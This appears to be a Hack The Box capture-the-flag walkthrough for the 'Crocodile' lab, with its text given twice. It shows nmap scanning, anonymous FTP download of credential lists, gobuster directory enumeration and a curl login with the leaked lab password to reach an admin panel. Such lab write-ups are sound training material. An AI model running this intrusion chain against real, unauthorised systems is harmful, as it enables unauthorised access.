_Tanapong_Sungkaew_via_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag
Introduction In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag. You’ll learn to: Enumerate FTP and download leaked credential files Extract valid usernames/passwords Use Gobuster to discover hidden web pages Authenticate to a PHP login panel and capture the flag Prerequisites Kali Linux (or any distro with ftp, gobuster, curl) HTB VPN connection 1. FTP Enumeration nmap -sC -sV -p 21,80 ftp # login: anonymous dir get allowed.userlist get allowed.userlist.passwd Inspect the lists: cat allowed.userlist cat allowed.userlist.passwd 2. Extract Credentials From allowed.userlist + .passwd, find a valid pair (e.g. admin / Supersecretpassword1). 3. Discover Hidden Pages gobuster dir \ --url http:/// \ --wordlist /usr/share/wordlists/dirb/common.txt \ -x php,html Look for /login.php. 4. Admin Login & Flag curl -d "username=admin&password=Supersecretpassword1" \ http:///login.php You’ll be redirected to the Admin panel—your flag is displayed at the top. 5. Lessons Learned Anonymous services often leak credentials. Combine leaked creds with web enumeration for full-chain exploits. Automate with scripts in professional engagements.
Introduction
In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag.
You’ll learn to:
- Enumerate FTP and download leaked credential files
- Extract valid usernames/passwords
- Use Gobuster to discover hidden web pages
- Authenticate to a PHP login panel and capture the flag
Prerequisites
- Kali Linux (or any distro with
ftp,gobuster,curl) - HTB VPN connection
1. FTP Enumeration
nmap -sC -sV -p 21,80
ftp
# login: anonymous
dir
get allowed.userlist
get allowed.userlist.passwd
Inspect the lists:
cat allowed.userlist
cat allowed.userlist.passwd
2. Extract Credentials
From allowed.userlist + .passwd, find a valid pair (e.g. admin / Supersecretpassword1).
3. Discover Hidden Pages
gobuster dir \
--url http:/// \
--wordlist /usr/share/wordlists/dirb/common.txt \
-x php,html
Look for /login.php.
4. Admin Login & Flag
curl -d "username=admin&password=Supersecretpassword1" \
http:///login.php
You’ll be redirected to the Admin panel—your flag is displayed at the top.
5. Lessons Learned
- Anonymous services often leak credentials.
- Combine leaked creds with web enumeration for full-chain exploits.
- Automate with scripts in professional engagements.
